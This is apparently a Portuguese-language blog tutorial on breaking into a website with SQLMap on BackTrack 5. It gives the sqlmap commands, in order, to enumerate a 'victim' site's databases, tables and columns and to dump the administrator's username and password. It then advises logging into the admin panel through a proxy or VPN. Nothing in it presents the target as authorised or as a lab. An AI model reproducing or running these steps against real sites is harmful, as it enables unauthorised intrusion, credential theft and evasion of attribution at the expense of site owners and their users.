Como Hackear site usando Backtrack (SqlMap)

Postado em 15:23 by Administrador

No meu tutorial anterior expliquei o que é Backtrack , agora neste tutorial eu vou encinar como hackear site usando Backtrack 5 (SqlMap). SqlMap é uma ferramenta de injeção de SQL automático que ajuda você a hackear site facilmente. Siga os passos simples para hackear site usando BackTrack 5 ferramenta de SqlMap. 1. Abra o terminal e digite backtrack cd /pentest/database/sqlmap e aperte enter.
 
2. Agora, encontrar o site vulnerável. (Bom, eu já tenho um site vulnerável)
 
3. Agora digite este comando no terminal e aperte enter. (Ver figura acima)
python sqlmap.py -u http://sitedavitima'slink/index.php?id=4 –dbs
4. Agora você vai ter o nome do banco de dados do site

Bem, eu tenho a aj database de dados e information_schema vamos selecionar dados aj. 5. Agora pegue as tabelas de database. para isso você precisa digitar esse comando em seu terminal e simplesmente pressione Enter.
python sqlmap.py -u http://sitedavitima'slink/index.php?id=4 -D  (database name) –tables
6. Agora precisamos pegar as tabelas do database aj. cole este comando comando abaixo e pressione Enter.
python sqlmap.py -u http://www.sitedavitima'slink.com/index.php?id=4 -D aj –tables 

 

7. Agora você terá a lista de tabelas que é armazenado no database aj.
8. Agora vamos pegar as colunas da tabela do administrador
python sqlmap.py -u http://www.sitedavitima'slink.com/index.php?id=4 -T admin --columns

 

Agora temos as colunas e temos nome de usuário e senha 9. Agora vamos pegar as senhas do administrador
python sqlmap.py -u http://www.sitedavitima'slink.com/index.php?id=4 -T admin -U test --dump 
Agora temos o nome de usuário ea senha do site!
Agora é só encontrar o penal administrador do site e usar o proxy / vpn quando você está tentando fazer o login no site como um administrador.

Sem resposta para "Como Hackear site usando Backtrack (SqlMap)"